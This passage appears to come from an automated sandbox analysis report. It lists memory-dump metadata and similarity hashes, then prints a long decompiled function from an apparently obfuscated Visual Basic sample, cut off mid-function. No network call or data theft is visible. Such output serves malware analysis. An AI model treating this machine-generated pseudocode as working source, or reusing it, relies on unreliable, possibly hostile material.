                            0x00402bdd
                            0x00402c2a
                            0x00402c2c
                            0x00402c2e
                            0x00402c77
                            0x00402c78
                            0x00402c79
                            0x00402c7b
                            0x00402cc8
                            0x00402cc8
                            0x00402d16
                            0x00402d17
                            0x00402d18
                            0x00402d19
                            0x00402d1a
                            0x00402d1c
                            0x00402d6c
                            0x00402d6e
                            0x00402d70
                            0x00402d71
                            0x00402d73
                            0x00402dc2
                            0x00402dc4
                            0x00402dc6
                            0x00402dc7
                            0x00402dc8
                            0x00402dca
                            0x00402dcb
                            0x00402dcc

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.778936421.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.778932055.0000000000400000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778954507.0000000000410000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.778980538.0000000000412000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID: Vz/
                            • API String ID: 0-3916506933
                            • Opcode ID: 15eee861497ac63c8cb5c9965937c743cddd47b7f024db0dc9d9b121e77e34d8
                            • Instruction ID: 56eb5caee382f2c2566f9785de5a006b9d534719edef97c4d90c7cfe4a14d8ea
                            • Opcode Fuzzy Hash: 15eee861497ac63c8cb5c9965937c743cddd47b7f024db0dc9d9b121e77e34d8
                            • Instruction Fuzzy Hash: 4EC1556145E7C48FC3076A308A585B13FA4EB5335672946EBC4D3AA0F3E16D0C4BA79A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 56%
                            			E0040C1BA(void* __ebx, void* __edi, void* __esi, signed int _a4) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				char _v40;
                            				void* _v56;
                            				void* _v72;
                            				short _v76;
                            				char _v80;
                            				long long _v88;
                            				signed int _v92;
                            				signed int _v96;
                            				char _v100;
                            				char _v104;
                            				signed int _v108;
                            				char _v112;
                            				char _v116;
                            				char _v120;
                            				intOrPtr _v128;
                            				char _v136;
                            				intOrPtr _v144;
                            				char _v152;
                            				intOrPtr _v160;
                            				char _v168;
                            				char* _v176;
                            				char _v184;
                            				intOrPtr _v192;
                            				char _v200;
                            				signed int _v208;
                            				char _v216;
                            				char _v220;
                            				char _v224;
                            				char _v228;
                            				char* _v232;
                            				char _v236;
                            				char _v240;
                            				char _v244;
                            				char _v248;
                            				intOrPtr _v252;
                            				char _v256;
                            				char _v264;
                            				signed int _v268;
                            				signed int _v272;
                            				signed int _v276;
                            				signed int _v280;
                            				intOrPtr* _v284;
                            				signed int _v288;
                            				signed int _v292;
                            				signed int _v296;
                            				signed int _v300;
                            				char _v316;
                            				char _v332;
                            				signed int _v344;
                            				signed int _v348;
                            				signed int _v352;
                            				signed int _v356;
                            				signed int _v360;
                            				intOrPtr _v364;
                            				signed int _v368;
                            				signed int _v372;
                            				signed int _v376;
                            				signed int _v380;
                            				intOrPtr* _v384;
                            				signed int _v388;
                            				signed int _v392;
                            				intOrPtr* _v396;
                            				signed int _v400;
                            				intOrPtr* _v404;
                            				signed int _v408;
                            				char _v412;
                            				signed int _v416;
                            				signed int _v420;
                            				intOrPtr* _v424;
                            				signed int _v428;
                            				intOrPtr* _v432;
                            				signed int _v436;
                            				intOrPtr* _v440;
                            				signed int _v444;
                            				intOrPtr* _v448;
                            				signed int _v452;
                            				intOrPtr* _v456;
                            				signed int _v460;
                            				signed int _v464;
                            				intOrPtr* _v468;
                            				signed int _v472;
                            				intOrPtr* _v476;
                            				signed int _v480;
                            				intOrPtr* _v484;
                            				signed int _v488;
                            				intOrPtr* _v492;
                            				signed int _v496;
                            				signed int _v500;
                            				signed int _v504;
                            				signed int _v508;
                            				intOrPtr* _v512;
                            				signed int _v516;
                            				intOrPtr* _v520;
                            				signed int _v524;
                            				intOrPtr* _v528;
                            				signed int _v532;
                            				intOrPtr* _v536;
                            				signed int _v540;
                            				intOrPtr* _v544;
                            				signed int _v548;
                            				intOrPtr* _v552;
                            				signed int _v556;
                            				intOrPtr* _v560;
                            				signed int _v564;
                            				intOrPtr* _v568;
                            				signed int _v572;
                            				signed int _v576;
                            				intOrPtr* _v580;
                            				signed int _v584;
                            				intOrPtr* _v588;
                            				signed int _v592;
                            				intOrPtr* _v596;
                            				signed int _v600;
                            				intOrPtr* _v604;
                            				signed int _v608;
                            				signed int _v612;
                            				signed int _t815;
                            				signed int _t822;
                            				signed int _t826;
                            				signed int _t830;
                            				signed int _t834;
                            				char* _t838;
                            				signed int _t842;
                            				signed int _t848;
                            				signed int _t855;
                            				signed int _t859;
                            				signed int _t863;
                            				signed int _t867;
                            				char* _t871;
                            				signed int _t875;
                            				signed int _t879;
                            				signed int _t883;
                            				signed int _t915;
                            				signed int _t919;
                            				signed int _t929;
                            				signed int _t933;
                            				signed int _t937;
                            				signed int _t941;
                            				signed int _t945;
                            				char* _t949;
                            				signed int _t953;
                            				signed int _t957;
                            				signed int _t961;
                            				char* _t963;
                            				signed int _t969;
                            				signed int _t977;
                            				char* _t983;
                            				signed int _t989;
                            				signed int _t993;
                            				signed int _t997;
                            				signed int _t1001;
                            				signed int _t1005;
                            				char* _t1009;
                            				signed int _t1013;
                            				signed int _t1017;
                            				signed int _t1021;
                            				signed int _t1046;
                            				signed int _t1050;
                            				signed int _t1054;
                            				signed int _t1058;
                            				char* _t1062;
                            				signed int _t1066;
                            				signed int _t1071;
                            				signed int _t1075;
                            				char* _t1077;
                            				signed int _t1088;
                            				signed int _t1100;
                            				signed int _t1104;
                            				signed int _t1108;
                            				signed int _t1112;
                            				char* _t1116;
                            				signed int _t1120;
                            				signed int _t1124;
                            				signed int _t1128;
                            				signed int _t1147;
                            				char* _t1150;
                            				char* _t1155;
                            				signed int _t1161;
                            				signed int _t1166;
                            				intOrPtr _t1178;
                            				intOrPtr _t1192;
                            				intOrPtr _t1196;
                            				intOrPtr _t1210;
                            				intOrPtr _t1239;
                            				intOrPtr _t1251;
                            				void* _t1285;
                            				void* _t1287;
                            				intOrPtr _t1288;
                            				long long* _t1289;
                            				void* _t1290;
                            				intOrPtr* _t1292;
                            				void* _t1293;
                            				void* _t1294;
                            				void* _t1296;
                            				long long* _t1297;
                            				intOrPtr* _t1299;
                            
                            				_t1288 = _t1287 - 0xc;
                            				 *[fs:0x0] = _t1288;
                            				L004012A0();
                            				_v16 = _t1288;
                            				_v12 = 0x4011c8;
                            				_v8 = _a4 & 0x00000001;
                            				_a4 = _a4 & 0xfffffffe;
                            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t1285);
                            				_v176 =  &M0040B214;
                            				_v184 = 8;
                            				L004013E4();
                            				_push( &_v136);
                            				_push( &_v152); // executed
                            				L004013EA(); // executed
                            				_v192 = 0x15;
                            				_v200 = 0x8002;
                            				_push( &_v152);
                            				_t815 =  &_v200;
                            				_push(_t815);
                            				L004013F0();
                            				_v268 = _t815;
                            				_push( &_v152);
                            				_push( &_v136);
                            				_push(2);
                            				L00401432();
                            				_t1289 = _t1288 + 0xc;
                            				if(_v268 != 0) {
                            					if( *0x4103c4 != 0) {
                            						_v384 = 0x4103c4;
                            					} else {
                            						_push(0x4103c4);
                            						_push(0x40b248);
                            						L004013DE();
                            						_v384 = 0x4103c4;
                            					}
                            					_v268 =  *_v384;
                            					_t1161 =  *((intOrPtr*)( *_v268 + 0x1c))(_v268,  &_v104);
                            					asm("fclex");
                            					_v272 = _t1161;
                            					if(_v272 >= 0) {
                            						_v388 = _v388 & 0x00000000;
                            					} else {
                            						_push(0x1c);
                            						_push(0x40b238);
                            						_push(_v268);
                            						_push(_v272);
                            						L004013D8();
                            						_v388 = _t1161;
                            					}
                            					_v276 = _v104;
                            					_t1166 =  *((intOrPtr*)( *_v276 + 0x64))(_v276, 1,  &_v220);
                            					asm("fclex");
                            					_v280 = _t1166;
                            					if(_v280 >= 0) {
                            						_v392 = _v392 & 0x00000000;
                            					} else {
                            						_push(0x64);
                            						_push(0x40b258);
                            						_push(_v276);
                            						_push(_v280);
                            						L004013D8();
                            						_v392 = _t1166;
                            					}
                            					_v76 = _v220;
                            					L004013D2();
                            				}
                            				if( *0x410010 != 0) {
                            					_v396 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v396 = 0x410010;
                            				}
                            				_t822 =  &_v104;
                            				L004013CC();
                            				_v268 = _t822;
                            				_t826 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t822,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x2fc))( *_v396));
                            				asm("fclex");
                            				_v272 = _t826;
                            				if(_v272 >= 0) {
                            					_v400 = _v400 & 0x00000000;
                            				} else {
                            					_push(0x48);
                            					_push(0x40b268);
                            					_push(_v268);
                            					_push(_v272);
                            					L004013D8();
                            					_v400 = _t826;
                            				}
                            				if( *0x410010 != 0) {
                            					_v404 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v404 = 0x410010;
                            				}
                            				_t830 =  &_v108;
                            				L004013CC();
                            				_v276 = _t830;
                            				_t834 =  *((intOrPtr*)( *_v276 + 0x48))(_v276,  &_v96, _t830,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x314))( *_v404));
                            				asm("fclex");
                            				_v280 = _t834;
                            				if(_v280 >= 0) {
                            					_v408 = _v408 & 0x00000000;
                            				} else {
                            					_push(0x48);
                            					_push(0x40b278);
                            					_push(_v276);
                            					_push(_v280);
                            					L004013D8();
                            					_v408 = _t834;
                            				}
                            				if( *0x410010 != 0) {
                            					_v412 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v412 = 0x410010;
                            				}
                            				_t1178 =  *((intOrPtr*)( *_v412));
                            				_t838 =  &_v112;
                            				L004013CC();
                            				_v284 = _t838;
                            				_t842 =  *((intOrPtr*)( *_v284 + 0xe8))(_v284,  &_v232, _t838,  *((intOrPtr*)(_t1178 + 0x31c))( *_v412));
                            				asm("fclex");
                            				_v288 = _t842;
                            				if(_v288 >= 0) {
                            					_v416 = _v416 & 0x00000000;
                            				} else {
                            					_push(0xe8);
                            					_push(0x40b288);
                            					_push(_v284);
                            					_push(_v288);
                            					L004013D8();
                            					_v416 = _t842;
                            				}
                            				_v344 = _v96;
                            				_v96 = _v96 & 0x00000000;
                            				_v128 = _v344;
                            				_v136 = 8;
                            				L004012A0();
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				 *_t1289 =  *0x4011c0;
                            				_t848 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, _v92, _t1178, _t1178, 0x10, 0x514f93, _v232);
                            				_v292 = _t848;
                            				if(_v292 >= 0) {
                            					_v420 = _v420 & 0x00000000;
                            				} else {
                            					_push(0x6fc);
                            					_push(0x40af38);
                            					_push(_a4);
                            					_push(_v292);
                            					L004013D8();
                            					_v420 = _t848;
                            				}
                            				L00401462();
                            				_push( &_v112);
                            				_push( &_v108);
                            				_push( &_v104);
                            				_push(3);
                            				L004013C6();
                            				_t1290 = _t1289 + 0x10;
                            				L00401450();
                            				if( *0x410010 != 0) {
                            					_v424 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v424 = 0x410010;
                            				}
                            				_t855 =  &_v104;
                            				L004013CC();
                            				_v268 = _t855;
                            				_t859 =  *((intOrPtr*)( *_v268 + 0xf0))(_v268,  &_v108, _t855,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x314))( *_v424));
                            				asm("fclex");
                            				_v272 = _t859;
                            				if(_v272 >= 0) {
                            					_v428 = _v428 & 0x00000000;
                            				} else {
                            					_push(0xf0);
                            					_push(0x40b278);
                            					_push(_v268);
                            					_push(_v272);
                            					L004013D8();
                            					_v428 = _t859;
                            				}
                            				if( *0x410010 != 0) {
                            					_v432 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v432 = 0x410010;
                            				}
                            				_t863 =  &_v112;
                            				L004013CC();
                            				_v276 = _t863;
                            				_t867 =  *((intOrPtr*)( *_v276 + 0x48))(_v276,  &_v92, _t863,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x31c))( *_v432));
                            				asm("fclex");
                            				_v280 = _t867;
                            				if(_v280 >= 0) {
                            					_v436 = _v436 & 0x00000000;
                            				} else {
                            					_push(0x48);
                            					_push(0x40b288);
                            					_push(_v276);
                            					_push(_v280);
                            					L004013D8();
                            					_v436 = _t867;
                            				}
                            				if( *0x410010 != 0) {
                            					_v440 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v440 = 0x410010;
                            				}
                            				_t871 =  &_v116;
                            				L004013CC();
                            				_v284 = _t871;
                            				_t875 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v220, _t871,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x300))( *_v440));
                            				asm("fclex");
                            				_v288 = _t875;
                            				if(_v288 >= 0) {
                            					_v444 = _v444 & 0x00000000;
                            				} else {
                            					_push(0x128);
                            					_push(0x40b268);
                            					_push(_v284);
                            					_push(_v288);
                            					L004013D8();
                            					_v444 = _t875;
                            				}
                            				if( *0x410010 != 0) {
                            					_v448 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v448 = 0x410010;
                            				}
                            				_t1192 =  *((intOrPtr*)( *_v448));
                            				_t879 =  &_v120;
                            				L004013CC();
                            				_v292 = _t879;
                            				_t883 =  *((intOrPtr*)( *_v292 + 0x1dc))(_v292,  &_v96, _t879,  *((intOrPtr*)(_t1192 + 0x300))( *_v448));
                            				asm("fclex");
                            				_v296 = _t883;
                            				if(_v296 >= 0) {
                            					_v452 = _v452 & 0x00000000;
                            				} else {
                            					_push(0x1dc);
                            					_push(0x40b268);
                            					_push(_v292);
                            					_push(_v296);
                            					L004013D8();
                            					_v452 = _t883;
                            				}
                            				_v348 = _v96;
                            				_v96 = _v96 & 0x00000000;
                            				_v160 = _v348;
                            				_v168 = 8;
                            				_v176 = 0x5a42e0;
                            				_v184 = 3;
                            				_v232 = 0x3554e3;
                            				_v228 = 0x17dd;
                            				_v224 = _v220;
                            				_v352 = _v92;
                            				_v92 = _v92 & 0x00000000;
                            				_v144 = _v352;
                            				_v152 = 8;
                            				_v356 = _v108;
                            				_v108 = _v108 & 0x00000000;
                            				_v128 = _v356;
                            				_v136 = 9;
                            				L004012A0();
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				_v240 =  *0x4011bc;
                            				L004012A0();
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v136, 0x10,  &_v224, _t1192,  &_v228,  &M0040B0E0,  &_v232, 0x10,  &_v168);
                            				L004013C6();
                            				L00401432();
                            				_t1292 = _t1290 + 0x24;
                            				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v136, 3,  &_v136,  &_v152,  &_v168, 4,  &_v104,  &_v112,  &_v116,  &_v120);
                            				L004013C0();
                            				if( *0x410010 != 0) {
                            					_v456 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v456 = 0x410010;
                            				}
                            				_t1196 =  *((intOrPtr*)( *_v456));
                            				_t915 =  &_v104;
                            				L004013CC();
                            				_v268 = _t915;
                            				_t919 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t915,  *((intOrPtr*)(_t1196 + 0x304))( *_v456));
                            				asm("fclex");
                            				_v272 = _t919;
                            				if(_v272 >= 0) {
                            					_v460 = _v460 & 0x00000000;
                            				} else {
                            					_push(0x48);
                            					_push(0x40b268);
                            					_push(_v268);
                            					_push(_v272);
                            					L004013D8();
                            					_v460 = _t919;
                            				}
                            				_v192 = 0x7cf5f3;
                            				_v200 = 3;
                            				_v220 = 0x74c1;
                            				_v176 = L"overstiges";
                            				_v184 = 8;
                            				_v360 = _v92;
                            				_v92 = _v92 & 0x00000000;
                            				_v128 = _v360;
                            				_v136 = 8;
                            				L004012A0();
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				 *_t1292 =  *0x4011b8;
                            				L004012A0();
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				L004012A0();
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				_t929 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x10, 0x10, _t1196,  &_v220, 0x39ff, 0x10, 0x667a4db0, 0x5b07,  &_v256);
                            				_v276 = _t929;
                            				if(_v276 >= 0) {
                            					_v464 = _v464 & 0x00000000;
                            				} else {
                            					_push(0x700);
                            					_push(0x40af38);
                            					_push(_a4);
                            					_push(_v276);
                            					L004013D8();
                            					_v464 = _t929;
                            				}
                            				_v88 = _v256;
                            				L004013D2();
                            				L00401450();
                            				if( *0x410010 != 0) {
                            					_v468 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v468 = 0x410010;
                            				}
                            				_t933 =  &_v104;
                            				L004013CC();
                            				_v268 = _t933;
                            				_t937 =  *((intOrPtr*)( *_v268 + 0xa0))(_v268,  &_v220, _t933,  *((intOrPtr*)( *((intOrPtr*)( *_v468)) + 0x314))( *_v468));
                            				asm("fclex");
                            				_v272 = _t937;
                            				if(_v272 >= 0) {
                            					_v472 = _v472 & 0x00000000;
                            				} else {
                            					_push(0xa0);
                            					_push(0x40b278);
                            					_push(_v268);
                            					_push(_v272);
                            					L004013D8();
                            					_v472 = _t937;
                            				}
                            				if( *0x410010 != 0) {
                            					_v476 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v476 = 0x410010;
                            				}
                            				_t941 =  &_v108;
                            				L004013CC();
                            				_v276 = _t941;
                            				_t945 =  *((intOrPtr*)( *_v276 + 0x1a0))(_v276,  &_v224, _t941,  *((intOrPtr*)( *((intOrPtr*)( *_v476)) + 0x304))( *_v476));
                            				asm("fclex");
                            				_v280 = _t945;
                            				if(_v280 >= 0) {
                            					_v480 = _v480 & 0x00000000;
                            				} else {
                            					_push(0x1a0);
                            					_push(0x40b268);
                            					_push(_v276);
                            					_push(_v280);
                            					L004013D8();
                            					_v480 = _t945;
                            				}
                            				if( *0x410010 != 0) {
                            					_v484 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v484 = 0x410010;
                            				}
                            				_t949 =  &_v112;
                            				L004013CC();
                            				_v284 = _t949;
                            				_t953 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v232, _t949,  *((intOrPtr*)( *((intOrPtr*)( *_v484)) + 0x318))( *_v484));
                            				asm("fclex");
                            				_v288 = _t953;
                            				if(_v288 >= 0) {
                            					_v488 = _v488 & 0x00000000;
                            				} else {
                            					_push(0x128);
                            					_push(0x40b278);
                            					_push(_v284);
                            					_push(_v288);
                            					L004013D8();
                            					_v488 = _t953;
                            				}
                            				if( *0x410010 != 0) {
                            					_v492 = 0x410010;
                            				} else {
                            					_push("Hr_");
                            					_push(0x40a678);
                            					L004013DE();
                            					_v492 = 0x410010;
                            				}
                            				_t1210 =  *((intOrPtr*)( *_v492));
                            				_t957 =  &_v116;
                            				L004013CC();
                            				_v292 = _t957;
                            				_t961 =  *((intOrPtr*)( *_v292 + 0xf0))(_v292,  &_v120, _t957,  *((intOrPtr*)(_t1210 + 0x318))( *_v492));
                            				asm("fclex");
                            				_v296 = _t961;
                            				if(_v296 >= 0) {
                            					_v496 = _v496 & 0x00000000;
                            				} else {
                            					_push(0xf0);
                            					_push(0x40b278);
                            					_push(_v292);
                            					_push(_v296);
                            					L004013D8();
                            					_v496 = _t961;
                            				}
                            				L004013BA();
                            				_t1293 = _t1292 + 0x10;
                            				_t963 =  &_v136;
                            				L004013B4();
                            				_v240 = _t963;
                            				_v236 = 0x6b5bc3;
                            				_v256 =  *0x4011b0;
                            				_v412 =  *0x4011a8;
                            				_t969 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v256, 0x31f0, _v220, _v224,  &_v236, _v232, _t1210, _t1210,  &_v240, 0x60d, 0x5cfc, _t963,  &_v136, _v120, 0, 0);
                            				_v300 = _t969;
                            				if(_v300 >= 0) {
                            					_v500 = _v500 & 0x00000000;
                            				} else {
                            					_push(0x704);
                            					_push(0x40af38);
                            					_push(_a4);
                            					_push(_v300);
                            					L004013D8();
                            					_v500 = _t969;
                            				}
                            				L004013C6();
                            				_t1294 = _t1293 + 0x18;
                            				L00401450();
                            				_t977 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 5,  &_v104,  &_v108,  &_v112,  &_v116,  &_v120);
                            				asm("fclex");
                            				_v268 = _t977;
                            				if(_v268 >= 0) {
                            					_v504 = _v504 & 0x00000000;
                            				} else {
                            					_push(0x2b4);
                            					_push(0x40af08);
                            					_push(_a4);
                            					_push(_v268);
                            					L004013D8();
                            					_v504 = _t977;
                            				}
                            				_v176 = 1;
                            				_v184 = 2;
                            				_v192 = 0x5f7a;
                            				_v200 = 2;
                            				_v208 = _v208 & 0x00000000;
                            				_v216 = 2;
                            				_push( &_v184);
                            				_push( &_v200);
                            				_push( &_v216);
                            				_push( &_v332);
                            				_push( &_v316);
                            				_t983 =  &_v40;
                            				_push(_t983);
                            				L004013AE();
                            				_v364 = _t983;
                            				while(_v364 != 0) {
                            					_v176 = L"RRETS";
                            					_v184 = 8;
                            					L004013E4();
                            					_v264 =  *0x4011a0;
                            					_v256 = 0x418e7d50;
                            					_v252 = 0x5af3;
                            					_t989 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v256, 0x4d7a,  &_v264, 0x6e4acb,  &_v136);
                            					_v268 = _t989;
                            					if(_v268 >= 0) {
                            						_v508 = _v508 & 0x00000000;
                            					} else {
                            						_push(0x708);
                            						_push(0x40af38);
                            						_push(_a4);
                            						_push(_v268);
                            						L004013D8();
                            						_v508 = _t989;
                            					}
                            					L00401450();
                            					if( *0x410010 != 0) {
                            						_v512 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v512 = 0x410010;
                            					}
                            					_t993 =  &_v104;
                            					L004013CC();
                            					_v268 = _t993;
                            					_t997 =  *((intOrPtr*)( *_v268 + 0x68))(_v268,  &_v232, _t993,  *((intOrPtr*)( *((intOrPtr*)( *_v512)) + 0x314))( *_v512));
                            					asm("fclex");
                            					_v272 = _t997;
                            					if(_v272 >= 0) {
                            						_v516 = _v516 & 0x00000000;
                            					} else {
                            						_push(0x68);
                            						_push(0x40b278);
                            						_push(_v268);
                            						_push(_v272);
                            						L004013D8();
                            						_v516 = _t997;
                            					}
                            					if( *0x410010 != 0) {
                            						_v520 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v520 = 0x410010;
                            					}
                            					_t1001 =  &_v108;
                            					L004013CC();
                            					_v276 = _t1001;
                            					_t1005 =  *((intOrPtr*)( *_v276 + 0x90))(_v276,  &_v220, _t1001,  *((intOrPtr*)( *((intOrPtr*)( *_v520)) + 0x31c))( *_v520));
                            					asm("fclex");
                            					_v280 = _t1005;
                            					if(_v280 >= 0) {
                            						_v524 = _v524 & 0x00000000;
                            					} else {
                            						_push(0x90);
                            						_push(0x40b288);
                            						_push(_v276);
                            						_push(_v280);
                            						L004013D8();
                            						_v524 = _t1005;
                            					}
                            					if( *0x410010 != 0) {
                            						_v528 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v528 = 0x410010;
                            					}
                            					_t1009 =  &_v112;
                            					L004013CC();
                            					_v284 = _t1009;
                            					_t1013 =  *((intOrPtr*)( *_v284 + 0xf8))(_v284,  &_v92, _t1009,  *((intOrPtr*)( *((intOrPtr*)( *_v528)) + 0x308))( *_v528));
                            					asm("fclex");
                            					_v288 = _t1013;
                            					if(_v288 >= 0) {
                            						_v532 = _v532 & 0x00000000;
                            					} else {
                            						_push(0xf8);
                            						_push(0x40b268);
                            						_push(_v284);
                            						_push(_v288);
                            						L004013D8();
                            						_v532 = _t1013;
                            					}
                            					if( *0x410010 != 0) {
                            						_v536 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v536 = 0x410010;
                            					}
                            					_t1017 =  &_v116;
                            					L004013CC();
                            					_v292 = _t1017;
                            					_t1021 =  *((intOrPtr*)( *_v292 + 0x1dc))(_v292,  &_v96, _t1017,  *((intOrPtr*)( *((intOrPtr*)( *_v536)) + 0x308))( *_v536));
                            					asm("fclex");
                            					_v296 = _t1021;
                            					if(_v296 >= 0) {
                            						_v540 = _v540 & 0x00000000;
                            					} else {
                            						_push(0x1dc);
                            						_push(0x40b268);
                            						_push(_v292);
                            						_push(_v296);
                            						L004013D8();
                            						_v540 = _t1021;
                            					}
                            					_v144 = 0x85aaa;
                            					_v152 = 3;
                            					_v192 = 0x791fc7;
                            					_v200 = 3;
                            					_v368 = _v96;
                            					_v96 = _v96 & 0x00000000;
                            					_v128 = _v368;
                            					_v136 = 8;
                            					_v240 =  *0x401198;
                            					_v372 = _v92;
                            					_v92 = _v92 & 0x00000000;
                            					L0040145C();
                            					_v256 =  *0x401190;
                            					_v236 = _v232;
                            					_v176 = 0x51ddc9;
                            					_v184 = 3;
                            					L004012A0();
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					_v592 =  *0x401188;
                            					L004012A0();
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					 *((intOrPtr*)( *_a4 + 0x724))(_a4, 0x10,  &_v236, _v220,  &_v256,  &_v100,  &_v100,  &_v240,  &_v136, 0x10,  &_v152);
                            					L00401462();
                            					_push( &_v116);
                            					_push( &_v112);
                            					_push( &_v108);
                            					_push( &_v104);
                            					_push(4);
                            					L004013C6();
                            					_push( &_v152);
                            					_push( &_v136);
                            					_push(2);
                            					L00401432();
                            					_t1296 = _t1294 + 0x20;
                            					if( *0x410010 != 0) {
                            						_v544 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v544 = 0x410010;
                            					}
                            					_t1046 =  &_v104;
                            					L004013CC();
                            					_v268 = _t1046;
                            					_t1050 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t1046,  *((intOrPtr*)( *((intOrPtr*)( *_v544)) + 0x308))( *_v544));
                            					asm("fclex");
                            					_v272 = _t1050;
                            					if(_v272 >= 0) {
                            						_v548 = _v548 & 0x00000000;
                            					} else {
                            						_push(0x48);
                            						_push(0x40b268);
                            						_push(_v268);
                            						_push(_v272);
                            						L004013D8();
                            						_v548 = _t1050;
                            					}
                            					if( *0x410010 != 0) {
                            						_v552 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v552 = 0x410010;
                            					}
                            					_t1054 =  &_v108;
                            					L004013CC();
                            					_v276 = _t1054;
                            					_t1058 =  *((intOrPtr*)( *_v276 + 0xe8))(_v276,  &_v220, _t1054,  *((intOrPtr*)( *((intOrPtr*)( *_v552)) + 0x318))( *_v552));
                            					asm("fclex");
                            					_v280 = _t1058;
                            					if(_v280 >= 0) {
                            						_v556 = _v556 & 0x00000000;
                            					} else {
                            						_push(0xe8);
                            						_push(0x40b278);
                            						_push(_v276);
                            						_push(_v280);
                            						L004013D8();
                            						_v556 = _t1058;
                            					}
                            					if( *0x410010 != 0) {
                            						_v560 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v560 = 0x410010;
                            					}
                            					_t1062 =  &_v112;
                            					L004013CC();
                            					_v284 = _t1062;
                            					_t1066 =  *((intOrPtr*)( *_v284 + 0x58))(_v284,  &_v116, _t1062,  *((intOrPtr*)( *((intOrPtr*)( *_v560)) + 0x31c))( *_v560));
                            					asm("fclex");
                            					_v288 = _t1066;
                            					if(_v288 >= 0) {
                            						_v564 = _v564 & 0x00000000;
                            					} else {
                            						_push(0x58);
                            						_push(0x40b288);
                            						_push(_v284);
                            						_push(_v288);
                            						L004013D8();
                            						_v564 = _t1066;
                            					}
                            					_push(0);
                            					_push(0);
                            					_push(_v116);
                            					_push( &_v152);
                            					L004013BA();
                            					_t1297 = _t1296 + 0x10;
                            					if( *0x410010 != 0) {
                            						_v568 = 0x410010;
                            					} else {
                            						_push("Hr_");
                            						_push(0x40a678);
                            						L004013DE();
                            						_v568 = 0x410010;
                            					}
                            					_t1239 =  *((intOrPtr*)( *_v568));
                            					_t1071 =  &_v120;
                            					L004013CC();
                            					_v292 = _t1071;
                            					_t1075 =  *((intOrPtr*)( *_v292 + 0x60))(_v292,  &_v232, _t1071,  *((intOrPtr*)(_t1239 + 0x314))( *_v568));
                            					asm("fclex");
                            					_v296 = _t1075;
                            					if(_v296 >= 0) {
                            						_v572 = _v572 & 0x00000000;
                            					} else {
                            						_push(0x60);
                            						_push(0x40b278);
                            						_push(_v292);
                            						_push(_v296);
                            						L004013D8();
                            						_v572 = _t1075;
                            					}
                            					_v240 = _v232;
                            					_t1077 =  &_v152;
                            					L004013B4();
                            					_v236 = _t1077;
                            					_v376 = _v92;
